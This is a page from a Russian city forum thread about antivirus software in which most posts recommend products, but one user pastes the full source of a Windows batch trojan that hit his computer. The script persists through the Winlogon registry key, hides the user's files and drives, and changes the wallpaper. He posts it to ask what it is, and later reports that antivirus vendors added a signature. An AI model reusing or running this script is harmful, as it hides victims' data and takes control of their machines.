 |
Ярпортал: форум Ярославля  |
 Совместные покупки Объявления  Поиск  Все вопросы: yaroslavl@bk.ru
|
| Здравствуйте, Гость ( Вход·Регистрация ) | Сделать Yarportal.Ru стартовой страницей |
|
| Страницы: (13) « Первая ... 11 12 [13] ( Перейти к первому непрочитанному сообщению ) |    |
| outsayder |
Дата 28.06.2011 - 17:16
|
|
эт вирус у тебя, он блокирует сайты антивирусов....... скачай на работе утилиту Dr.Web CureIT и прогони, думаю найдешь его...  Это сообщение отредактировал outsayder - 29.06.2011 - 07:38 |
||
 
|
| C_Nastya |
Дата 28.06.2011 - 23:05
|
|
outsayder
Спасибо, все получилось ) |
|
|
|
| Мезузу |
 Дата 27.01.2012 - 22:40
|
|
Схватил такую фигню в формате .bat
Появилось это Потом изчезли все папки на дисках. Ни один антивирус не опознал.  Если кто разбирается подскажите откуда он взялся, куда делся и когда снова ожидать. Комп вылечил вручную. @Echo off set Data2=%TEMP%\Data2.exe set Data3=%TEMP%\Data3 set TBTask=%SYSTEMROOT%\TBTask\TBTask.exe set Service=%SYSTEMROOT%\TBTask\Service.dat set Config=%SYSTEMROOT%\TBTask\Config.dat set Remover=%SYSTEMROOT%\TBTask\Remover.bat set Generated=%SYSTEMROOT%\Generated.bmp find /i /c "Done" "%Config%"&& (del %Data3% >nul >%Remover% echo @Echo off >>%Remover% echo :dif1 >>%Remover% echo del %TEMP%\Data2.exe >>%Remover% echo if exist %TEMP%\Data2.exe goto dif1 >>%Remover% echo exit start %Remover% >nul exit) rem прерываем утановку, если троян уже однажды прожил свой цикл в системе if exist %Data3% (MD %SYSTEMROOT%\TBTask >nul attrib +h +s %SYSTEMROOT%\TBTask >nul move %Data2% %TBTask% >nul move %Data3% %Service% >nul reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "%SYSTEMROOT%\system32\userinit.exe,%SYSTEMROOT%\TBTask\TBTask.exe" /f >nul) rem установка нашего трояна в систему find /i /c "Ready2" "%Config%"|| goto dif2 attrib +h +s c:\*.txt /s >nul attrib +h +s c:\*.!ut /s >nul attrib +h +s c:\*.3gp /s >nul attrib +h +s c:\*.aac /s >nul attrib +h +s c:\*.ac3 /s >nul attrib +h +s c:\*.avi /s >nul attrib +h +s c:\*.chm /s >nul attrib +h +s c:\*.cue /s >nul attrib +h +s c:\*.djv /s >nul attrib +h +s c:\*.djvu /s >nul attrib +h +s c:\*.dmf /s >nul attrib +h +s c:\*.doc /s >nul attrib +h +s c:\*.docx /s >nul attrib +h +s c:\*.dot /s >nul attrib +h +s c:\*.flac /s >nul attrib +h +s c:\*.flv /s >nul attrib +h +s c:\*.gif /s >nul attrib +h +s c:\*.jar /s >nul attrib +h +s c:\*.htm /s >nul attrib +h +s c:\*.html /s >nul attrib +h +s c:\*.ifo /s >nul attrib +h +s c:\*.iso /s >nul attrib +h +s c:\*.jpeg /s >nul attrib +h +s c:\*.jpg /s >nul attrib +h +s c:\*.kar /s >nul attrib +h +s c:\*.m3u /s >nul attrib +h +s c:\*.m2v /s >nul attrib +h +s c:\*.m4v /s >nul attrib +h +s c:\*.mht /s >nul attrib +h +s c:\*.mid /s >nul attrib +h +s c:\*.midi /s >nul attrib +h +s c:\*.mkv /s >nul attrib +h +s c:\*.mov /s >nul attrib +h +s c:\*.mp3 /s >nul attrib +h +s c:\*.mp4 /s >nul attrib +h +s c:\*.mpeg /s >nul attrib +h +s c:\*.mpg /s >nul attrib +h +s c:\*.ogg /s >nul attrib +h +s c:\*.pdf /s >nul attrib +h +s c:\*.plc /s >nul attrib +h +s c:\*.pls /s >nul attrib +h +s c:\*.png /s >nul attrib +h +s c:\*.qt /s >nul attrib +h +s c:\*.rar /s >nul attrib +h +s c:\*.rtf /s >nul attrib +h +s c:\*.key /s >nul attrib +h +s c:\*.tif /s >nul attrib +h +s c:\*.tiff /s >nul attrib +h +s c:\*.torrent /s >nul attrib +h +s c:\*.ts /s >nul attrib +h +s c:\*.vob /s >nul attrib +h +s c:\*.wav /s >nul attrib +h +s c:\*.wma /s >nul attrib +h +s c:\*.wmv /s >nul attrib +h +s c:\*.zip /s >nul attrib +h +s c:\*.eml /s >nul set disk="d" :dif6 if not exist "%disk%:\" goto dif5 attrib +h +s %disk%:\*.* /s /d >nul :dif5 if %disk% == "d" (set disk="e" goto dif6) if %disk% == "e" (set disk="f" goto dif6) if %disk% == "f" (set disk="g" goto dif6) if %disk% == "g" (set disk="h" goto dif6) if %disk% == "h" (set disk="i" goto dif6) if %disk% == "i" (set disk="j" goto dif6) if %disk% == "j" (set disk="k" goto dif6) if %disk% == "k" (set disk="l" goto dif6) if %disk% == "l" (set disk="m" goto dif6) if %disk% == "m" (set disk="n" goto dif6) if %disk% == "n" (set disk="o" goto dif6) rem применение атрибутов к файлам и папкам reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "%SYSTEMROOT%\system32\userinit.exe," /f >nul >%Config% echo Done >%Remover% echo @Echo off >>%Remover% echo :dif1 >>%Remover% echo del %SYSTEMROOT%\TBTask\TBTask.exe >>%Remover% echo if exist %SYSTEMROOT%\TBTask\TBTask.exe goto dif1 >>%Remover% echo exit start %Remover% >nul exit :dif2 rem удаление трояна find /i /c "Ready1" "%Config%"|| goto dif3 move %Service% %Generated% >nul reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d %SYSTEMROOT%\Generated.bmp /f >nul reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d 0 /f >nul reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 2 /f >nul :dif3 rem установка обоев рабочего стола set ARG0=0 set /a ARG=ARG0 + 1 :dif4 find /i /c "l%ARG%" "%Config%"&& (set /a ARG=ARG + 1 goto dif4) >>%Config% echo l%ARG% if "%ARG%" == "19" >>%Config% echo Ready1 if "%ARG%" == "20" >>%Config% echo Ready2 rem счётчик запусков find /i /c "Registered" "%Config%"&& exit ping 1.1.1.1 -n 1 -w 20000 2>nul | find "ttl=" >nul start /min iexplore.exe >nul ping 1.1.1.1 -n 1 -w 5000 2>nul | find "ttl=" >nul TASKKILL /IM iexplore.exe /T >nul >>%Config% echo Registered rem регистрация нового инсталла |
|
|
|
| Andfox |
Дата 28.01.2012 - 00:00
|
|
Harvey
А я себе не так давно поставил Доктора Веба , благо в инетмагазине скидка была и дешёво обошёлся, и довольно таки не плохим показался антивирусом, в разы получше чем аваст или авира, стоящие до этого. Ясен пень, бесплатные авира и аваст ваще не антивирусы, а чисто так, цветные иконки на панельке.  |
|
|
|
| Aylatan |
Дата 30.01.2012 - 11:40
|
|
Kaspersky CRYSTAL - один из самых лучших(комплексная защита РС)
 |
|
|
|
| Мезузу |
Дата 30.01.2012 - 11:54
|
|
Это сообщение отредактировал Мезузу - 9.02.2012 - 10:54 |
|
|
|
| Мезузу |
Дата 30.01.2012 - 11:56
|
 Это сообщение отредактировал Мезузу - 9.02.2012 - 10:55 |
|
|
|
| Мезузу |
Дата 30.01.2012 - 23:52
|
|
Первым откликнулся Dr.Web в 15.32
Ваш запрос был проанализирован. Соответствующая запись добавлена в вирусную базу Dr.Web и будет доступна при следующем обновлении. Угроза: Trojan.Siggen3.42913 Спасибо за сотрудничество. После одумался НОД32 в 22.06 Присланный Вами вирус определяется с версией базы данных сигнатур вирусов №6839 Спасибо за помощь в борьбе с вирусами. Здесь результаты он-лайн сканирования Это сообщение отредактировал Мезузу - 31.01.2012 - 00:12 |
|
|
|
| Joy |
Дата 31.01.2012 - 12:56
|
|
на работе SEP дома MS ES
|
|
|
|
| shuric__k |
Дата 8.02.2012 - 04:06
|
|
ДрВеб рулит
|
|
|
|
| ~Vladislav~ |
Дата 8.02.2012 - 08:51
|
|
не так давно перешел на антивир от компании symantec, вообще классная штука.
|
|
|
|
« | Компьютеры и мобильные телефоны | »
Страницы:
(13) « Первая ... 11 12 [13] |
|
[ Время генерации скрипта: 0.0125 ] [ Использовано запросов: 15 ] [ GZIP включён ]
Правила Ярпортала (включая политику обработки персональных данных)
Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.